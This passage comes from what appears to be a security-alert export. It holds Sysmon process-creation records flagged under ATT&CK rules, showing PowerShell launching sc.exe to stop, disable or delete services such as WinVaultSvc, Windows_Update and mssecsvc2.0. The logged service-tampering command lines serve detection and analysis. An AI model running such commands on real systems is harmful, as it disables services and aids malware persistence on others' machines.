WinVaultSvc",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:56.931161700Z"",""eventRecordID"":""2946"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:56.928\r\nProcessGuid: {df9fc3d3-b3b0-5ecf-0000-00108a502600}\r\nProcessId: 6724\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinVaultSvc\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:56.928"",""processGuid"":""{df9fc3d3-b3b0-5ecf-0000-00108a502600}"",""processId"":""6724"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinVaultSvc"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:25.333",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:56.916 +ProcessGuid: {df9fc3d3-b3b0-5ecf-0000-0010154f2600} +ProcessId: 5532 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config WinVaultSvc Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config WinVaultSvc Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:56.920271500Z"",""eventRecordID"":""2945"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:56.916\r\nProcessGuid: {df9fc3d3-b3b0-5ecf-0000-0010154f2600}\r\nProcessId: 5532\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config WinVaultSvc Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:56.916"",""processGuid"":""{df9fc3d3-b3b0-5ecf-0000-0010154f2600}"",""processId"":""5532"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config WinVaultSvc Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:25.291",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:56.887 +ProcessGuid: {df9fc3d3-b3b0-5ecf-0000-0010c04b2600} +ProcessId: 7304 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SvcNlauser +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SvcNlauser",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:56.890564100Z"",""eventRecordID"":""2943"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:56.887\r\nProcessGuid: {df9fc3d3-b3b0-5ecf-0000-0010c04b2600}\r\nProcessId: 7304\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SvcNlauser\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:56.887"",""processGuid"":""{df9fc3d3-b3b0-5ecf-0000-0010c04b2600}"",""processId"":""7304"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SvcNlauser"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:25.241",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:56.841 +ProcessGuid: {df9fc3d3-b3b0-5ecf-0000-00109c472600} +ProcessId: 3224 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""Windows Managers"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""Windows Managers\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:56.845035500Z"",""eventRecordID"":""2940"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:56.841\r\nProcessGuid: {df9fc3d3-b3b0-5ecf-0000-00109c472600}\r\nProcessId: 3224\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""Windows Managers\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:56.841"",""processGuid"":""{df9fc3d3-b3b0-5ecf-0000-00109c472600}"",""processId"":""3224"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""Windows Managers\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:25.183",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:56.811 +ProcessGuid: {df9fc3d3-b3b0-5ecf-0000-0010e7452600} +ProcessId: 7940 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete Windows_Update +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete Windows_Update",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:56.816267000Z"",""eventRecordID"":""2938"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:56.811\r\nProcessGuid: {df9fc3d3-b3b0-5ecf-0000-0010e7452600}\r\nProcessId: 7940\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete Windows_Update\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:56.811"",""processGuid"":""{df9fc3d3-b3b0-5ecf-0000-0010e7452600}"",""processId"":""7940"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete Windows_Update"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:25.158",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:56.796 +ProcessGuid: {df9fc3d3-b3b0-5ecf-0000-00100c452600} +ProcessId: 7704 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Windows_Update +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Windows_Update",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:56.799420300Z"",""eventRecordID"":""2937"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:56.796\r\nProcessGuid: {df9fc3d3-b3b0-5ecf-0000-00100c452600}\r\nProcessId: 7704\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Windows_Update\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:56.796"",""processGuid"":""{df9fc3d3-b3b0-5ecf-0000-00100c452600}"",""processId"":""7704"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Windows_Update"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:24.748",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:56.747 +ProcessGuid: {df9fc3d3-b3b0-5ecf-0000-00101b422600} +ProcessId: 1144 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop mssecsvc2.0 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop mssecsvc2.0",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:56.750441900Z"",""eventRecordID"":""2934"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:56.747\r\nProcessGuid: {df9fc3d3-b3b0-5ecf-0000-00101b422600}\r\nProcessId: 1144\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop 